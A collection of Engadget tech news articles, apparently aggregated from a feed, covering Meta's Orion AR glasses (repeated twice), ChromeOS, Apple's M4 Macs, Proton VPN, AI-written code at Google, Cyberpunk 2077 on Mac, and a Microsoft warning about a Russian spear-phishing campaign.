Meta’s Orion prototype offers a glimpse into our AR future

If you’re excited, or even just a little curious, about the future of augmented reality, Meta’s Orion prototype makes the most compelling case yet for the technology.

For Meta, Orion is about more than finally making AR glasses a reality. It’s also the company’s best shot at becoming less dependent on Apple and Google’s app stores, and the rules that come with them. If Orion succeeds, then maybe we won’t need smartphones for much at all. Glasses, Zuckerberg has speculated, might eventually become “the main way we do computing.”

At the moment, it’s still way too early to know if Zuckerberg’s bet will actually pay off. Orion is, for now, still a prototype. Meta hasn’t said when it might become widely available or how much it might cost. That's partly because the company, which has already poured tens of billions of dollars into AR and VR research, still needs to figure out how to make Orion significantly more affordable than the $10,000 it reportedly costs to make the current version. It also needs to refine Orion’s hardware and software. And, perhaps most importantly, the company will eventually need to persuade its vast user base that AI-infused, eye-tracking glasses offer a better way to navigate the world.

Still, Meta has been eager to show off Orion since its reveal at Connect. And, after recently getting a chance to try out Orion for myself, it’s easy to see why: Orion is the most impressive AR hardware I’ve seen.

Meta has clearly gone to great lengths to make its AR glasses look, well, normal. While Snap has been mocked for its oversized Spectacles, Orion’s shape and size is closer to a traditional pair of frames.

Even so, they’re still noticeably wide and chunky. The thick black frames, which house an array of cameras, sensors and custom silicon, may work on some face shapes, but I don’t think they are particularly flattering. And while they look less cartoonish than Snap’s AR Spectacles, I’m pretty sure I’d still get some funny looks if I walked around with them in public. At 98 grams, the glasses were noticeably bulkier than my typical prescription lenses, but never felt heavy.

In addition to the actual glasses, Orion relies on two other pieces of kit: a 182-gram “wireless compute puck, which needs to stay near the glasses, and an electromyography (EMG) wristband that allows you to control the AR interface with a series of hand gestures. The puck I saw was equipped with its own cameras and sensors, but Meta told me they’ve since simplified the remote control-shaped device so that it’s mainly used for connectivity and processing.

When I first saw the three-piece Orion setup at Connect, my first thought was that it was an interesting compromise in order to keep the glasses smaller. But after trying it all together, it really doesn’t feel like a compromise at all.

What the Orion glasses look like on.
The glasses were a bit wider than my face.
Karissa Bell for Engadget

You control Orion’s interface through a combination of eye tracking and gestures. After a quick calibration the first time you put the glasses on, you can navigate the AR apps and menus by glancing around the interface and tapping your thumb and index finger together. Meta has been experimenting with wrist-based neural interfaces for years, and Orion’s EMG wristband is the result of that work. The band, which feels like little more than a fabric watch band, uses sensors to detect the electrical signals that occur with even subtle movements of your wrist and fingers. Meta then uses machine learning to decode those signals and send them to the glasses.

That may sound complicated, but I was surprised by how intuitive the navigation felt. The combination of quick gestures and eye tracking felt much more precise than hand tracking controls I’ve used in VR. And while Orion also has hand-tracking abilities, it feels much more natural to quickly tap your fingers together than to extend your hands out in front of your face.

Meta walked me through a number of demos meant to show off Orion’s capabilities. I asked Meta AI to generate an image, and to come up with recipes based on a handful of ingredients on a shelf in front of me. The latter is a trick I’ve also tried with the Ray-Ban Meta Smart Glasses, except with Orion, Meta AI was also able to project the recipe steps onto the wall in front of me.

I also answered a couple of video calls, including one from a surprisingly lifelike Codec Avatar. I watched a YouTube video, scrolled Instagram Reels, and dictated a response to an incoming message. If you’ve used mixed reality headsets, much of this will sound familiar, and a lot of it wasn’t that different from what you can do in VR headsets.

The magic of AR, though, is that everything you see is overlaid onto the world around you and your surroundings are always fully visible. I particularly appreciated this when I got to the gaming portion of the walkthrough. I played a few rounds of a Meta-created game called Stargazer, where players control a retro-looking spacecraft by moving their head to avoid incoming obstacles while shooting enemies with finger tap gestures. Throughout that game, and a subsequent round of AR Pong, I was able to easily keep up a conversation with the people around me while I played. As someone who easily gets motion sick from VR gaming, I appreciated that I never felt disoriented or less aware of my surroundings.

Orion’s displays rely on silicon carbide lenses, micro-LED projectors and waveguides. The actual lenses are clear, though they can dim depending on your environment. One of the most impressive aspects is the 70-degree field of view. It was noticeably wider and more immersive than what I experienced with Snap’s AR Spectacles, which have a 46-degree field of view. At one point, I had three windows open in one multitasking view: Instagram Reels, a video call and a messaging inbox. And while I was definitely aware of the outer limits of the display, I could easily see all three windows without physically moving my head or adjusting my position. It’s still not the all-encompassing AR of sci-fi flicks, but it was wide enough I never struggled to keep the AR content in view.

What was slightly disappointing, though, was the resolution of Orion’s visuals. At 13 pixels per degree, the colors all seemed somewhat muted and projected text was noticeably fuzzy. None of it was difficult to make out, but it was much less vivid than what I saw on Snap’s AR Spectacles, which have a 37 pixels per degree resolution.

Meta’s VP of Wearable Devices, Ming Hua, told me that one of the company’s top priorities is to increase the brightness and resolution of Orion’s displays. She said that there’s already a version of the prototype with twice the pixel density, so there’s good reason to believe this will improve over time. She’s also optimistic that Meta will eventually be able to bring down the costs of its AR tech, eventually reducing it to something “similar to a high end phone.”

Leaving my demo at Meta’s headquarters, I was reminded of the first time I tried out a prototype of the wireless VR headset that would eventually become known as Quest, back in 2016. Called Santa Cruz at the time, it was immediately obvious, even to an infrequent VR user, that the wireless, room-tracking headset was the future of the company’s VR business. Now, it’s almost hard to believe there was a time when Meta’s headsets weren’t fully untethered.

Orion has the potential to be much bigger. Now, Meta isn’t just trying to create a more convenient form factor for mixed reality hobbyists and gamers. It’s offering a glimpse into how it views the future, and what our lives might look like when we’re no longer tethered to our phones.

For now, Orion is still just that: a glimpse. It’s far more complex than anything the company has attempted with VR. Meta still has a lot of work to do before that AR-enabled future can be a reality. But the prototype shows that much of that vision is closer than we think.

This article originally appeared on Engadget at https://www.engadget.com/ar-vr/metas-orion-prototype-offers-a-glimpse-into-our-ar-future-123038066.html?src=rss

Meta’s Orion prototype offers a glimpse into our AR future

If you’re excited, or even just a little curious, about the future of augmented reality, Meta’s Orion prototype makes the most compelling case yet for the technology.

For Meta, Orion is about more than finally making AR glasses a reality. It’s also the company’s best shot at becoming less dependent on Apple and Google’s app stores, and the rules that come with them. If Orion succeeds, then maybe we won’t need smartphones for much at all. Glasses, Zuckerberg has speculated, might eventually become “the main way we do computing.”

At the moment, it’s still way too early to know if Zuckerberg’s bet will actually pay off. Orion is, for now, still a prototype. Meta hasn’t said when it might become widely available or how much it might cost. That's partly because the company, which has already poured tens of billions of dollars into AR and VR research, still needs to figure out how to make Orion significantly more affordable than the $10,000 it reportedly costs to make the current version. It also needs to refine Orion’s hardware and software. And, perhaps most importantly, the company will eventually need to persuade its vast user base that AI-infused, eye-tracking glasses offer a better way to navigate the world.

Still, Meta has been eager to show off Orion since its reveal at Connect. And, after recently getting a chance to try out Orion for myself, it’s easy to see why: Orion is the most impressive AR hardware I’ve seen.

Meta has clearly gone to great lengths to make its AR glasses look, well, normal. While Snap has been mocked for its oversized Spectacles, Orion’s shape and size is closer to a traditional pair of frames.

Even so, they’re still noticeably wide and chunky. The thick black frames, which house an array of cameras, sensors and custom silicon, may work on some face shapes, but I don’t think they are particularly flattering. And while they look less cartoonish than Snap’s AR Spectacles, I’m pretty sure I’d still get some funny looks if I walked around with them in public. At 98 grams, the glasses were noticeably bulkier than my typical prescription lenses, but never felt heavy.

In addition to the actual glasses, Orion relies on two other pieces of kit: a 182-gram “wireless compute puck, which needs to stay near the glasses, and an electromyography (EMG) wristband that allows you to control the AR interface with a series of hand gestures. The puck I saw was equipped with its own cameras and sensors, but Meta told me they’ve since simplified the remote control-shaped device so that it’s mainly used for connectivity and processing.

When I first saw the three-piece Orion setup at Connect, my first thought was that it was an interesting compromise in order to keep the glasses smaller. But after trying it all together, it really doesn’t feel like a compromise at all.

What the Orion glasses look like on.
The glasses were a bit wider than my face.
Karissa Bell for Engadget

You control Orion’s interface through a combination of eye tracking and gestures. After a quick calibration the first time you put the glasses on, you can navigate the AR apps and menus by glancing around the interface and tapping your thumb and index finger together. Meta has been experimenting with wrist-based neural interfaces for years, and Orion’s EMG wristband is the result of that work. The band, which feels like little more than a fabric watch band, uses sensors to detect the electrical signals that occur with even subtle movements of your wrist and fingers. Meta then uses machine learning to decode those signals and send them to the glasses.

That may sound complicated, but I was surprised by how intuitive the navigation felt. The combination of quick gestures and eye tracking felt much more precise than hand tracking controls I’ve used in VR. And while Orion also has hand-tracking abilities, it feels much more natural to quickly tap your fingers together than to extend your hands out in front of your face.

Meta walked me through a number of demos meant to show off Orion’s capabilities. I asked Meta AI to generate an image, and to come up with recipes based on a handful of ingredients on a shelf in front of me. The latter is a trick I’ve also tried with the Ray-Ban Meta Smart Glasses, except with Orion, Meta AI was also able to project the recipe steps onto the wall in front of me.

I also answered a couple of video calls, including one from a surprisingly lifelike Codec Avatar. I watched a YouTube video, scrolled Instagram Reels, and dictated a response to an incoming message. If you’ve used mixed reality headsets, much of this will sound familiar, and a lot of it wasn’t that different from what you can do in VR headsets.

The magic of AR, though, is that everything you see is overlaid onto the world around you and your surroundings are always fully visible. I particularly appreciated this when I got to the gaming portion of the walkthrough. I played a few rounds of a Meta-created game called Stargazer, where players control a retro-looking spacecraft by moving their head to avoid incoming obstacles while shooting enemies with finger tap gestures. Throughout that game, and a subsequent round of AR Pong, I was able to easily keep up a conversation with the people around me while I played. As someone who easily gets motion sick from VR gaming, I appreciated that I never felt disoriented or less aware of my surroundings.

Orion’s displays rely on silicon carbide lenses, micro-LED projectors and waveguides. The actual lenses are clear, though they can dim depending on your environment. One of the most impressive aspects is the 70-degree field of view. It was noticeably wider and more immersive than what I experienced with Snap’s AR Spectacles, which have a 46-degree field of view. At one point, I had three windows open in one multitasking view: Instagram Reels, a video call and a messaging inbox. And while I was definitely aware of the outer limits of the display, I could easily see all three windows without physically moving my head or adjusting my position. It’s still not the all-encompassing AR of sci-fi flicks, but it was wide enough I never struggled to keep the AR content in view.

What was slightly disappointing, though, was the resolution of Orion’s visuals. At 13 pixels per degree, the colors all seemed somewhat muted and projected text was noticeably fuzzy. None of it was difficult to make out, but it was much less vivid than what I saw on Snap’s AR Spectacles, which have a 37 pixels per degree resolution.

Meta’s VP of Wearable Devices, Ming Hua, told me that one of the company’s top priorities is to increase the brightness and resolution of Orion’s displays. She said that there’s already a version of the prototype with twice the pixel density, so there’s good reason to believe this will improve over time. She’s also optimistic that Meta will eventually be able to bring down the costs of its AR tech, eventually reducing it to something “similar to a high end phone.”

Leaving my demo at Meta’s headquarters, I was reminded of the first time I tried out a prototype of the wireless VR headset that would eventually become known as Quest, back in 2016. Called Santa Cruz at the time, it was immediately obvious, even to an infrequent VR user, that the wireless, room-tracking headset was the future of the company’s VR business. Now, it’s almost hard to believe there was a time when Meta’s headsets weren’t fully untethered.

Orion has the potential to be much bigger. Now, Meta isn’t just trying to create a more convenient form factor for mixed reality hobbyists and gamers. It’s offering a glimpse into how it views the future, and what our lives might look like when we’re no longer tethered to our phones.

For now, Orion is still just that: a glimpse. It’s far more complex than anything the company has attempted with VR. Meta still has a lot of work to do before that AR-enabled future can be a reality. But the prototype shows that much of that vision is closer than we think.

This article originally appeared on Engadget at https://www.engadget.com/ar-vr/metas-orion-prototype-offers-a-glimpse-into-our-ar-future-123038066.html?src=rss

ChromeOS update makes it easier to avoid distractions

Google has released ChromeOS M130 to the stable channel, which means an update is now making its way to your Chromebook if you haven't gotten one yet. The latest version of the OS comes with a lengthy list of new features, starting with a Focus panel where you can quickly enable or disable Do-not-Disturb mode, create new or select from existing Google Tasks, as well as play music with focus sound or YouTube Music Premium if you have a subscription. Google is also making it easier to insert emojis, GIFs and even Google Drive links with the M130's new Launcher + f shortcut. In addition, the Quick Insert physical key on the Samsung Galaxy Chromebook Plus will be available on more devices coming out next year. 

To cut the time you need to find specific files, Google has added a Suggestions section in Tote, the space where you'll find your most recently downloaded items and latest screenshots. You'll now also be able to access all your starred Drive files right on the ChromeOS shelf, even when you're offline. And if you want to pick up from where you'd left off every time you switch on your computer, then you can enable "Welcome Recap" in Settings, which will let you preview and instantly restore apps and tabs from your previous session. 

In case you use your Chromebook to record videos or audio, you can take advantage of ChromeOS M130's studio-style mic function that adds "advanced balancing, reconstruction of fine details and room adaptation" to the standard mic function's noise cancellation and de-reverberation effects. Plus, you can use Google's AI-powered Recorder app, which is debuting with the new OS and which has speech-to-text capabilities that can create transcripts labeling each speaker, as well as summarize recorded content. 

The ChromeOS M130 also integrates appearance effects into the platform's video call controls, adds support for multiple calendars and allows you to move Picture-in-Picture (PiP) windows to one side of your screen to free up space. Finally, if you have a Chromebook Plus device, you'll be able to access an AI-powered feature called "Help me read" that makes it easy to find information in any text you're reading on your browser and in your Gallery. 

This article originally appeared on Engadget at https://www.engadget.com/computing/laptops/chromeos-update-makes-it-easier-to-avoid-distractions-120030197.html?src=rss

Everything Apple announced during its unofficial Mac Week

Following the illustrious line of calendar-spanning corporate events like Lobsterfest and Shark Week, Apple tried something new this year with a celebration unofficially known as Mac Week. (Fortunately for Apple, it just so happens to coincide with its earnings call on Thursday!) The company’s three-day product rollout for desktop hardware centered around the M4 chip, built for Apple Intelligence. We recount everything Apple spit out this week, including a new iMac, Mac mini, MacBook Pro and other goodies like Apple Intelligence’s official arrival on iOS, iPadOS and macOS.

Standard product shot of the new iMac
Apple

The M4-powered iMac has the same design (apart from some new colors) but with more horsepower inside. Apple says the all-in-one desktop is 1.7 times faster for daily productivity and 2.1 times faster for more demanding tasks like gaming or photo editing. Like all new Macs announced this week, it loses the measly 8GB of RAM previously seen in the cheapest Macs, jumping to 16GB as the baseline. (Woo!)

The new iMac still has a 24-inch 4.5K Retina display encased in an aluminum unibody design. However, it adds a new nano-texture glass screen option for reduced glare and a 12MP Center Stage camera that supports Apple’s Desk View.

You can pre-order the M4 iMac now, starting at $1,299. Deliveries and in-store sales begin on November 8.

Closeup of a person's hand holding the new (tiny) Mac mini
Apple

Apple’s little Mac that could lives up to its “mini” branding more than ever. The 2024 Mac mini is a mere five-inch by five-inch box, two inches tall. (That’s only slightly bigger than the Apple TV 4K!)

The new Mac mini is available in M4 and M4 Pro configurations. Apple says the M4 variant is up to 1.8 times faster than the M1 model from four years ago. Its graphics are up to 2.2 times faster. It should also be much better for Apple Intelligence: It supports 38 TOPS (tera operations per second) of AI processing power. That dwarfs the 18 TOPS from the (only one-year-old) M3 chip. It, too, starts with 16GB of RAM.

For the first time, the machine ditches legacy USB ports. It has two USB-C ports on the front and three Thunderbolt USB-C ports on the back (along with HDMI and Ethernet).

The M4 Mac mini is available to pre-order. It starts at $599, while the souped-up M4 Pro variant starts at $1,399. It arrives on November 9.

A person sitting in a lab, using the new MacBook Pro with M4 chip.
Apple

Most of Apple’s Mac sales are in the MacBook lineup, which makes sense. Not only can you use them on the go, but you can also grab a Thunderbolt cable and hook them up to the monitor of your choice to double as a desktop. So, the climax of Mac Week was the new M4-powered MacBook Pro.

The only new Mac with three chip tiers, the MacBook Pro comes in M4, M4 Pro and M4 Max options. Apple says the M4 Pro is up to three times faster than the M1 Pro, and the M4 Max is up to 3.5 times faster than the M1 Max. The M4 variant is up to 1.8 times faster than the M1-powered 13-inch MacBook Pro for photo editing. That jumps to 3.4 times faster for demanding work like rendering scenes in Blender.

Its Neural Engine for Apple Intelligence (and other AI) is over three times as powerful as the M1. Helping out on the AI front (and for all-around performance) is the same 16GB of RAM as a baseline.

The laptop offers the same nano-texture display option as the iMac and up to 1,000 nits of brightness for SDR content. It also adopts the 12MP Center Stage camera for much better built-in video call capabilities. The device has three Thunderbolt 4 ports and an estimated 24 hours of battery life — as Apple puts it, that’s the longest ever in a Mac.

The new MacBook Pro is available in familiar 14-inch and 16-inch models. The smaller model with the M4 chip starts at $1,599, the M4 Pro variant starts at $1,999, and the ultra-high-end M4 Max will set you back at least $3,199. The 16-inch MacBook Pro starts at $2,499 with the M4 Pro chip, while an M4 Max flavor is $3,499 and up.

Apple's Craig Federighi standing in front of a screen that reads
Apple

Apple’s first wave of on-device AI features is now in consumers’ hands, with no beta software required. This round includes writing tools like proofreading, rewiring and summaries, live call transcriptions and notification summaries.

The beginnings of a more intelligent Siri also arrived with this batch, including typed queries and an improved ability to recognize stutters or self-interruptions. You also get a neat new glowing border that announces to the world, “This ain’t the shitty Siri you’re used to!” But you’ll have to wait for the next wave of Siri upgrades for a more significant overhaul, like a better understanding of personal context.

Now, the bad news. Apple Intelligence is only available on a handful of recent devices in each of Apple’s major product categories. For the iPhone, that’s the iPhone 15 Pro / Pro Max and the new iPhone 16 lineup (including non-Pro models). You’ll need a model with an M-series chip on the iPad, although the new iPad mini (with an A17 Pro chip) is an exception. As for Macs, you’ll also need a model with M-series Apple silicon, which stretches back to the last four years of models.

Apple Intelligence (round one) requires iOS 18.1, iPadOS 18.1 or macOS Sequoia 15.1. The X.2 variants of each OS will bring the next wave of AI features, like ChatGPT integration and Image Playground.

Screen of an Apple hearing test
Apple

Not to be missed among the higher-profile announcements is a new series of hearing health tools for AirPods Pro 2 owners.

Announced at Apple’s September iPhone launch, the hearing features include a “clinically validated” hearing test, hearing protection (like for concerts) and the ability to use the device as a hearing aid if it detects mild to moderate impairment. (If severe, it will nudge you towards a professional.)

Engadget’s audio guru, Billy Steele, is the person to follow for more on these features. He’s extensively trialed them, including taking hearing tests with an Apple rep and test-driving AirPods-powered hearing protection at concerts.

This article originally appeared on Engadget at https://www.engadget.com/computing/everything-apple-announced-during-its-unofficial-mac-week-210115997.html?src=rss

Proton brings its VPN to Apple TV with new app

Proton announced the debut of an Apple TV app for its virtual private network. The new app, which was "among the most requested features from our community," according to the company's blog post, is available for download from the App Store on any Apple TV. It will allow customers with a paid Proton VPN plan to stream their media content from any location on Apple's set-top box.

Proton VPN was our favorite when we reviewed it in 2023, and it's still our top pick this year for a virtual private network. The service boasts excellent features for security, privacy and usability. Our only real complaint was that the free tier comes with a lot of limitations. But if you're interested in the company's platform, Proton is currently running an early Black Friday deal where you can snag one or two year plans at a steep discount.

This article originally appeared on Engadget at https://www.engadget.com/cybersecurity/vpn/proton-brings-its-vpn-to-apple-tv-with-new-app-204549019.html?src=rss

Google CEO says a quarter of the company’s new code is already AI generated

Google CEO Sundar Pichai just revealed that AI now generates more than a quarter of new code for its products, according to a company earnings call transcribed by Ars Technica. In other words, AI tools are already having an absolutely mammoth impact on the development of software.

Pichai did say that human programmers oversee the computer-generated code, which is something. The CEO noted that AI coding helps with “boosting productivity and efficiency," ensuring that engineers “do more and move faster.”

There’s no two ways around it. 25 percent is a lot, and Google is just one company relying on AI algorithms to perform complex coding tasks. According to Stack Overflow’s 2024 Developer Survey, over 75 percent of respondents are already using or are “planning to use” AI tools to assist with software development. Another survey by GitHub indicated that 92 percent of US-based developers are currently using AI coding tools.

This leads us to the rampaging elephant in the room. As AI continues to gobble up coding tasks, human experience starts to dwindle. This could eventually lead to a decreased knowledge base in which humans don’t know how to fix errors created by AI algorithms that were, in turn, created by other AI algorithms. We could be staring down an ouroboros of confusion where it’s nearly impossible to detect bugs amidst generations of AI code. Fun times!

We aren’t quite there yet, but AI-assisted coding shows no signs of slowing down. The process started its meteoric rise back in 2022 when GitHub widely launched its Copilot program. Since then, companies like Anthropic, Meta, Google and OpenAI have all released AI-coding software suites. GitHub recently announced that Copilot can now be used with models from Anthropic and Google, in addition to OpenAI.

This article originally appeared on Engadget at https://www.engadget.com/ai/google-ceo-says-a-quarter-of-the-companys-new-code-is-already-ai-generated-180038896.html?src=rss

Cyberpunk 2077: Ultimate Edition will be available for Macs early next year

Cyberpunk 2077 is finally coming to Mac computers. The first-person open world adventure was first released back in 2020, so Apple fans have been waiting nearly half a decade for this release. Developer CD Projekt RED hasn’t issued a launch date yet, but says the game will be available “early next year.”

This isn’t the base game. Mac owners are getting Cyberpunk 2077: Ultimate Edition, which features all pre-existing DLC and patches. This includes the massive Phantom Liberty expansion, which brings Idris Elba into the mix. The expansion was first released last year for consoles and PC.

The developer says this port takes “full advantage of Apple Silicon and the advanced technologies of Metal.” It’ll boast all kinds of modern bells and whistles, like path tracing, frame generation and built-in spatial audio.

As indicated, this port is only for Apple Silicon Macs, but CD Projekt RED hasn’t announced if there would be any barriers beyond that. We reached out to the developer to ask if the game will run on every chip, from the M1 to the recently-announced M4 Max. We’ll update this post when we hear something.

There’s also a cool policy in place for pre-existing players. If you own the game on PC via Steam, the purchase will carry over to Mac. 

This article originally appeared on Engadget at https://www.engadget.com/gaming/pc/cyberpunk-2077-ultimate-edition-will-be-available-for-macs-early-next-year-164520024.html?src=rss

Apple unveils its top-of-the-line M4 Max chip

Apple is continuing its week of announcements by revealing the latest MacBook Pro lineup, as well as its new top-of-the-line chip. The M4 Max has a 40-core GPU — double the number of cores found in the M4 Pro that the company revealed this week. It has a 16-core GPU with 12 performance and four efficiency cores and a 16-core neural engine that's said to be three times faster than the one on the M1 chip. The M4 Max supports up to 128GB of RAM with what Apple claims is 30 percent more memory bandwidth than the M3 Max offers.

The GPU is said to have faster cores and a ray-tracing engine that's twice as fast as the M3 chips. Apple claims the neural engine is up to twice as fast as the one on the previous-generation chipsets as well. In addition, Apple says the CPU is up to 2.2 times faster than the one in the M1 Max. 

As with the M4 and M4 Pro, the M4 Max is built on second-gen 3nm tech to bolster power efficiency and performance. Like the M4 Pro (which can be used to power the new Mac mini), the M4 Max supports Thunderbolt 5, which should make it faster to move files around as it has a data transfer capacity of up to 120GB per second. And, as with all of Apple's other M-series Macs, devices running on the M4 Max will support Apple Intelligence features.

This article originally appeared on Engadget at https://www.engadget.com/computing/apple-unveils-its-top-of-the-line-m4-max-chip-150241987.html?src=rss

Apple’s MacBook Pros get an M4 upgrade, including the new M4 Max chip

Not that it's a huge surprise after Apple's week of M4 upgrades — first with the 24-inch iMac, then the adorable new Mac mini — but today the company is also bringing its M4 chips to the 14-inch and 16-inch MacBook Pro. And, in addition to the base M4 chip and the M4 Pro, they can also be configured with the newly announced M4 Max.

Apple isn't sneaking in any major tweaks this time around, aside from bringing over the Space Black color option to the 14-inch MacBook Pro. Still, the internal upgrades should be compelling for anyone with an M1 MacBook Pro or an older Intel model. Just like with the M4 iMac and Mac mini, Apple is also making 16GB of RAM the default for the $1,599 14-inch MacBook Pro (fixing one of our biggest issues with that model). You can thank Apple Intelligence for that memory bump, even if you don't give a lick about AI.

Apple MacBook Pro M4
Apple

Apple isn't saying much about the M4 Max chip yet, but we know it'll feature up to a 16-core CPU (12 performance cores and 4 efficiency cores), and a 40-core GPU. In comparison, the M4 Pro sports a 14-core CPU and 20-core GPU, while the plain M4 chip comes with either 8 or 10 cores alongside a 10-core graphics chip. The M4 Max chip also supports up to 128GB of RAM with 30 percent more memory bandwidth than the M3 Max.

As for other upgrades, the M4 Pro and M4 Max MacBook Pros will also include three Thunderbolt 5 USB-C ports, just like the M4 Pro-equipped Mac mini. If you're constantly moving enormous files around, that alone could be a reason to step up, since Thunderbolt 5 can support up to 80 Gbps speeds (it can also reach up to 120 Gbps with its Bandwidth Boost feature). That's a huge step up from 40 Gbps limit of Thunderbolt 3 and 4, and it also opens the door for better external GPU support, as well as powerful AI accelerators.

Apple MacBook Pro M4
Apple

The new MacBook Pros have slightly brighter screens which can reach up to 1,000 nits of SDR brightness (compared to 600 nits before), and there's also a nano-texture display option. That feature is mainly meant for people working in very bright environments or direct sunlight, as it drastically reduces glare. Both machines are also getting 12MP Center Stage webcams, a huge upgrade over the previous 1080p cameras.

The 14-inch M4 MacBook Pro still starts at $1,599 ($1,499 for education customers), while the M4 Pro model starts at $1,999 ($1,849 for education). The 16-inch MacBook Pro, meanwhile, still starts at $2,499 ($2,299 for education customers). You can pre-order both laptops today, and they'll be in stores on November 8.

This article originally appeared on Engadget at https://www.engadget.com/computing/laptops/apples-macbook-pros-get-an-m4-upgrade-including-the-new-m4-max-chip-150055208.html?src=rss

Microsoft issues warning for ongoing Russia-affiliated spear-phishing campaign

Microsoft has issued a warning about an ongoing spear-phishing campaign by a threat actor called Midnight Blizzard, which US and UK authorities previously linked to Russia's intelligence agency. The company said it discovered that the bad actor has been sending out "highly targeted spear-phishing emails" since at least October 22 and that it believes the operation's goal is to collect intelligence. Based on its observations, the group has been sending emails to individuals linked to various sectors, but it's known for targeting both government and non-government organizations, IT service providers, academia and defense. In addition, while it mostly focuses on organizations in the US and in Europe, this campaign also targeted individuals in Australia and Japan.

Midnight Blizzard has already sent out thousands of spear-phishing emails to over 100 organizations for this campaign, Microsoft said, explaining that those emails contain a signed Remote Desktop Protocol (RDP) connected to a server the bad actor controls. The group used email addresses belonging to real organizations stolen during its previous activities, making targets think that they're opening legitimate emails. It also used social engineering techniques to make it look like the emails were sent by employees from Microsoft or Amazon Web Services. 

If someone clicks and opens the RDP attachment, a connection is established to the server Midnight Blizzard controls. It then gives the bad actor access to the target's files, any network drives or peripherals (such as microphones and printers) connected to their computer, as well as their passkeys, security keys and other web authentication information. It could also install malware in the target's computer and network, including remote-access trojans that it could use to remain in the victim's system even after the initial connection has been cut off. 

The group is known by many other names, such as Cozy Bear and APT29, but you might remember it as the threat actor behind the 2020 SolarWinds attacks, wherein it had managed to infiltrate hundreds of organizations around the world. It also broke into the emails of several senior Microsoft executives and other employees earlier this year, accessing communication between the company and its customers. Microsoft didn't say whether this campaign has anything to do with the US Presidential Elections, but it's advising potential targets to be more proactive in protecting their systems. 

This article originally appeared on Engadget at https://www.engadget.com/cybersecurity/microsoft-issues-warning-for-ongoing-russia-affiliated-spear-phishing-campaign-120003125.html?src=rss